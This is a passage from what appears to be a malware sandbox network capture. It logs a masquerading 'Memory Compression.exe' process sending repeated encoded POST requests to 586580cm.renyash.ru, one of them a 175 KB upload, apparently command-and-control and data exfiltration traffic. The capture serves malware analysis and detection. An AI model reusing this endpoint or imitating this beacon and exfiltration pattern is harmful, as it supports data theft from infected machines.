                                                                                                                                Data Ascii: 4;W^Q
                                                                                                                                Jan 11, 2025 15:02:58.244530916 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                27192.168.2.549915104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:02:58.421299934 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1756
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:02:58.769046068 CET1756OUTData Raw: 5f 56 5d 5d 5a 5c 58 55 5c 5f 50 57 54 50 59 53 59 50 5b 5a 57 56 54 5b 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _V]]Z\XU\_PWTPYSYP[ZWVT[[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!_%V0(T#41-$+):6=]#79:'*T<&[ 7V*.^''P*1
                                                                                                                                Jan 11, 2025 15:02:58.897181034 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:02:59.064980030 CET962INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:02:59 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YHbRozKT9GTAz%2BU6xMxk2wiDcxzfxTrWNQ4Tmo%2BD5dxYO8RRI9StLLm03%2FALRvpIPkSlISvuJmF7%2BywiA1hslNyFyywtEHecSs0dvOl%2BBhqe%2FikVccDvXT%2B57E%2B3A%2B1CSEkkGd6l"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 90057295de704211-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4494&min_rtt=1617&rtt_var=6362&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2066&delivery_rate=59255&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 09 1f 24 05 22 58 3e 51 21 3b 0f 0e 3d 22 24 06 24 33 21 5b 3d 0c 21 05 26 3b 0a 5c 2e 16 34 56 35 14 20 13 27 00 0b 15 27 00 2e 1d 28 11 2c 5d 00 10 23 08 27 0a 31 10 2c 21 36 0f 28 21 24 43 23 3f 34 05 26 2b 3a 55 22 33 0d 5f 20 2d 29 10 38 0f 05 50 2d 0a 39 02 39 38 0e 58 34 35 2b 55 00 14 23 0f 31 39 27 03 3e 0d 16 1c 37 38 32 11 33 02 20 1f 2a 05 24 55 2a 06 35 1d 3f 02 26 52 34 2f 2d 1d 29 55 3c 43 24 22 39 50 32 2c 21 5f 23 0d 2e 54 0d 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98$"X>Q!;="$$3![=!&;\.4V5 ''.(,]#'1,!6(!$C#?4&+:U"3_ -)8P-998X45+U#19'>7823 *$U*5?&R4/-)U<C$"9P2,!_#.T?WT0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                28192.168.2.549922104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:02:59.174072981 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:02:59.533139944 CET1060OUTData Raw: 5a 55 5d 5d 5f 52 58 5c 5c 5f 50 57 54 57 59 52 59 5d 5b 5d 57 5f 54 5e 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZU]]_RX\\_PWTWYRY][]W_T^[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!%0<X<2/76$)>+# :=0?!(6;X '=+.^''P*-
                                                                                                                                Jan 11, 2025 15:02:59.630008936 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:02:59.872162104 CET810INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:02:59 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e0qaiJColPdqWIScSuyoQ8s0QGL2EoGG6%2FHgpz8dZJ0jOwBX%2BY4t0yfv2V%2F70%2FeT2eIfFCuz9BctLkE5YMqIqFPzqmVAZ9pv%2FJtb3iPCbUHdtF%2FCb%2BBYbFdFA5gZMDOOyxBHiNfo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005729a6d1b42ad-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3105&min_rtt=1798&rtt_var=3289&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=119096&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                29192.168.2.549928104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:00.159341097 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:00.517425060 CET1060OUTData Raw: 5f 51 5d 54 5f 5b 58 52 5c 5f 50 57 54 50 59 5c 59 5d 5b 5f 57 54 54 5d 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _Q]T_[XR\_PWTPY\Y][_WTT][Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!_20'?!4\72*^35(^?*)+; 9W%?"+&;[!;*+.^''P*1
                                                                                                                                Jan 11, 2025 15:03:00.620906115 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:00.859489918 CET805INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:00 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bImfdQg%2FgBz2Wba8VgjLl2sFgw2wD3Aj0%2F7vbWt9Gkvk3mzK2D5cJotMyglEl9eZIrSmYRaaQ0XSfqK5Q967%2FQbFip54SZ4JVH1cgKlWX60kynGUEoC395usROa%2BtasIR7M7xETy"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900572a098ce5e74-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=10122&min_rtt=1662&rtt_var=17544&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=21053&cwnd=111&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                30192.168.2.549934104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:01.107301950 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:01.516357899 CET1060OUTData Raw: 5a 52 58 5e 5a 59 58 56 5c 5f 50 57 54 56 59 5a 59 57 5b 5c 57 55 54 5e 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZRX^ZYXV\_PWTVYZYW[\WUT^[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"'07<<Z 2%'% _==\)'4**S%,1(66<*+.^''P*)
                                                                                                                                Jan 11, 2025 15:03:01.571134090 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:01.853835106 CET797INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:01 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XwclE60HR4x4gFMxvkObp0tdCffV0YVt3JAXBSrcrhNYzP6KZ4LQEoP5LKXn%2FQOgskIPlgruZDxqwxhQJtIEsvHmna90faeHkxztsSbXDer8qkPdoqKP78DYL9yztT3VTgBbz41Z"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900572a689a9436f-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=5441&min_rtt=2476&rtt_var=6859&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=55725&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                31192.168.2.549940104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:02.013588905 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1056
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:02.361159086 CET1056OUTData Raw: 5a 53 5d 54 5f 59 58 54 5c 5f 50 57 54 55 59 52 59 5c 5b 5c 57 54 54 5c 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZS]T_YXT\_PWTUYRY\[\WTT\[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!X&0#+4"!0C0X>2=(T "'/U(6$!#*.^''P*
                                                                                                                                Jan 11, 2025 15:03:02.475773096 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:02.651747942 CET802INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:02 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qF0kIppJbr5eIOca5JxsG1cvj8O20IVIBWKD%2Br7MbWMXaaL1oUUxC8Ry34Mfm08medc%2BXVZHAnSyNRCGWObJm94BxJ6Xh1i5cinU5c6m2mjoUlVWbZ%2BL40u9OvjzobhceFGeUF5d"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900572ac3a8f1861-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2726&min_rtt=1490&rtt_var=3032&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1366&delivery_rate=128250&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                32192.168.2.549946104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:02.841905117 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                33192.168.2.549948104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:03.095138073 CET312OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 175348
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:03.439388037 CET12360OUTData Raw: 5f 56 5d 54 5f 5b 58 57 5c 5f 50 57 54 55 59 5f 59 5c 5b 58 57 57 54 5d 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _V]T_[XW\_PWTUY_Y\[XWWT][Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!\' '?"+413+?9Z>+(!*!0"W<'X6>;.^''P*5
                                                                                                                                Jan 11, 2025 15:03:03.446546078 CET2472OUTData Raw: 37 20 33 1d 39 5b 3a 05 32 20 12 27 3a 26 07 31 2d 01 2f 2b 22 31 38 33 06 01 38 53 3e 39 3f 00 3d 56 3b 3d 3a 2a 29 09 24 29 15 12 3d 3f 1d 1f 04 00 3e 0b 02 3f 56 34 0f 3c 1c 22 29 23 01 02 0e 31 0c 18 27 28 1f 13 27 2c 3d 58 39 0e 13 3f 23 02
                                                                                                                                Data Ascii: 7 39[:2 ':&1-/+"1838S>9?=V;=:*)$)=?>?V4<")#1'(',=X9?#=6]*1U9S^&/*.Q>1$Y<9>1V527?@ Y&]I8)]4>V!X16Z[6[6=%3A7 =2*]%<&04 4<V);'1T TQ )3_7705^T'/>.%+07,_=$?.\>
                                                                                                                                Jan 11, 2025 15:03:03.446578026 CET4944OUTData Raw: 37 5d 32 58 24 06 35 24 0d 3c 08 59 36 04 2f 59 27 57 38 25 23 29 53 50 0d 5e 21 0c 34 22 30 5e 3e 54 10 5e 32 54 0f 1e 0b 5c 27 5b 01 02 2c 51 3a 5c 06 59 24 3d 32 5e 09 5a 0c 57 07 05 2b 05 06 2f 28 04 3c 31 00 30 2f 55 36 50 33 30 5c 27 38 03
                                                                                                                                Data Ascii: 7]2X$5$<Y6/Y'W8%#)SP^!4"0^>T^2T\'[,Q:\Y$=2^ZW+/(<10/U6P30\'8<<+1"/? \32P77"X(#Y5[?\3)+:^?(TV>ZX*,%V2?:#Y,>E!V!>81X8T&:^ #)]Z0(*# UX0;:(9?>63>=_(.' 7#3T-T976$)]2,?9"0Z1(C8>0W
                                                                                                                                Jan 11, 2025 15:03:03.446696997 CET4944OUTData Raw: 39 59 06 1b 3d 2a 04 1d 3e 2f 0e 04 3b 2e 51 2d 2e 30 12 15 37 24 31 5b 01 38 2f 00 22 31 30 37 2a 38 5c 57 09 03 33 06 3e 0d 19 13 26 16 2d 00 38 5d 01 2c 3c 11 1d 36 35 2b 1f 11 33 06 0b 2a 3d 5a 2a 32 05 56 27 1a 38 55 2e 15 0d 02 18 1a 27 32
                                                                                                                                Data Ascii: 9Y=*>/;.Q-.07$1[8/"107*8\W3>&-8],<65+3*=Z*2V'8U.'21RZ>+> 3:.6-1*T-= #>+"Z \103""+!4UZ"$7'8++U#(3%#<'^%4S<+2) /!852;.Y8920("TZ!-=:=<0?)3$:.9";9.23)T) 76<0
                                                                                                                                Jan 11, 2025 15:03:03.446728945 CET2472OUTData Raw: 27 08 3e 3a 3d 56 35 39 23 5e 2a 5d 05 3a 08 2f 0d 0e 00 1e 30 08 0a 10 36 3a 2d 3e 24 55 26 58 0e 33 2a 04 3d 02 59 58 22 00 22 3d 3e 0a 24 5f 27 0b 3c 5f 0f 22 3e 5e 3d 1b 0d 2a 2a 00 13 1c 05 15 0d 23 34 5e 39 36 08 06 21 2d 37 18 28 33 0c 36
                                                                                                                                Data Ascii: '>:=V59#^*]:/06:->$U&X3*=YX""=>$_'<_">^=**#4^96!-7(36**@X%R\=<,[\??)0:6191T"(ZS53316!^$>*T$R39[>$%?R3=4=<B?!Z-\*UC#8\Z#U_8>,1Y8W413831![$?/$_>@$9\8<-,\]*/:[
                                                                                                                                Jan 11, 2025 15:03:03.446892023 CET7416OUTData Raw: 30 3e 0c 0a 28 23 27 27 3b 3c 38 3a 0a 5e 21 37 23 22 30 37 20 04 51 58 2c 54 34 29 00 24 22 11 01 06 24 1e 38 57 38 14 3f 38 1e 15 3f 2a 1d 58 30 20 44 10 37 02 29 1a 0b 37 01 28 26 05 11 0e 3e 5f 2d 57 04 2e 35 11 0a 2f 22 26 04 0d 3b 1d 3e 08
                                                                                                                                Data Ascii: 0>(#'';<8:^!7#"07 QX,T4)$"$8W8?8?*X0 D7)7(&>_-W.5/"&;>*&&][<<2WVZ&_:9>_W>)2/$5^R>?5<>P!??Q<$ 0Z03?;((]+!&T)B<8%<*0=*0$Z<:,['[Y9?=W_:)R8(T3!09=02:\.*'.)-8?:8=
                                                                                                                                Jan 11, 2025 15:03:03.446926117 CET2472OUTData Raw: 34 05 30 40 3d 3f 22 20 35 0a 00 54 34 08 50 0a 39 3e 09 16 3c 5e 22 17 3e 0d 02 1b 22 2c 10 19 04 0f 02 2e 31 28 31 2c 32 5f 33 25 3b 30 20 56 01 35 3b 2c 3e 01 37 5f 03 1d 37 08 0c 5f 32 1a 3c 28 3f 0b 3b 11 50 29 04 5f 04 54 2b 59 35 39 0d 2f
                                                                                                                                Data Ascii: 40@=?" 5T4P9><^">",.1(1,2_3%;0 V5;,>7_7_2<(?;P)_T+Y59/"+V9.291X0P=W#\])1\18#&\=TT%9.#-P:,\#?>V(>35>4T!]6*;5-?[7*'(;;+)*87$_#:V.($Z)&>55^! <)/:S3#X0/='?9'
                                                                                                                                Jan 11, 2025 15:03:03.451920033 CET7416OUTData Raw: 0f 00 00 56 3c 42 56 1c 0b 09 38 2f 34 2e 00 5a 2a 1a 5f 1c 0a 2c 27 56 36 3a 14 39 30 06 0f 01 27 2d 07 00 2d 12 02 1f 3e 08 0d 5f 3e 2d 5a 32 0b 5d 2d 3d 34 08 12 2f 25 32 18 1e 06 21 32 10 26 2b 28 10 03 38 01 55 3f 03 30 5a 3f 3f 04 38 3e 2d
                                                                                                                                Data Ascii: V<BV8/4.Z*_,'V6:90'-->_>-Z2]-=4/%2!2&+(8U?0Z??8>-R3?&6."55]Q*W8? %?7 0Y];1246*Z*/_ 3-]?0)<W78,'>5U1,%W4[Y,5/<3W:>]#48"$&6>5T">3&#+Z< :-?9,#'1'W)($AT
                                                                                                                                Jan 11, 2025 15:03:03.451972008 CET2472OUTData Raw: 00 02 2f 31 0b 25 07 21 3e 38 52 57 31 2a 1e 5a 36 19 24 52 02 04 31 1a 35 29 0a 5d 25 59 24 54 2e 2e 5d 35 08 2f 25 27 0a 03 2a 5e 3a 58 02 16 22 1c 28 00 22 2f 39 28 3b 01 29 51 04 23 1a 12 24 20 3a 5d 3e 20 3e 58 3f 28 3c 11 2e 28 3c 1a 27 5c
                                                                                                                                Data Ascii: /1%!>8RW1*Z6$R15)]%Y$T..]5/%'*^:X"("/9(;)Q#$ :]> >X?(<.(<'\**^0!R0"+!(6<U&Y06"+T#8<X'<U[Z>\65A9[6\7T$+8P2]H,3>_Y'*3=[$5:!!9#,=;A!T2(]6V1 "*"6#>+ +[:#8#>=!$(::91U#(
                                                                                                                                Jan 11, 2025 15:03:03.454993963 CET4944OUTData Raw: 03 5d 0f 54 33 59 07 0d 3d 05 0c 18 06 30 02 07 3e 54 26 0d 0b 39 0f 11 3e 0e 21 5d 25 20 13 24 3f 39 2a 28 2c 5e 2e 3c 0d 57 51 00 05 54 27 3b 21 26 0b 2e 08 1d 22 24 3e 5b 3a 2b 3d 07 27 3f 3f 17 04 00 3e 08 33 04 3f 08 09 2c 3f 30 25 1f 0c 39
                                                                                                                                Data Ascii: ]T3Y=0>T&9>!]% $?9*(,^.<WQT';!&."$>[:+='??>3?,?0%97*&5-*9?R6>/-*:"(?1\9'/%[=<31?!#9,(=)"10=":"X<^-38$?&70&9"5V0+"G'#162A8,=3 $+#Z%4W67B^X!" -7]?:\3Y27
                                                                                                                                Jan 11, 2025 15:03:03.554227114 CET25INHTTP/1.1 100 Continue


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                34192.168.2.549954104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:03.315133095 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:03.673789978 CET1060OUTData Raw: 5f 55 58 5d 5f 5a 58 5c 5c 5f 50 57 54 56 59 52 59 5d 5b 50 57 57 54 51 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _UX]_ZX\\_PWTVYRY][PWWTQ[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"%0,]<1<_72='5'>9+;4)%<>*5;!'S(+.^''P*)
                                                                                                                                Jan 11, 2025 15:03:03.777609110 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:03.956792116 CET801INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:03 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sd6hmEKIcmX2JHx4frorEXhdCuSsZAHa7guIsGUtSOmlvf7%2BxHVcbp%2B3D4ChDEPGUwsCBhBxfK0Q5WOOmjiHsOK6XFakhqzRIXppAskloQ1qnyhUrs0lhOWJJLn5PEO5%2F7AfpWpT"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900572b4593cc44f-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
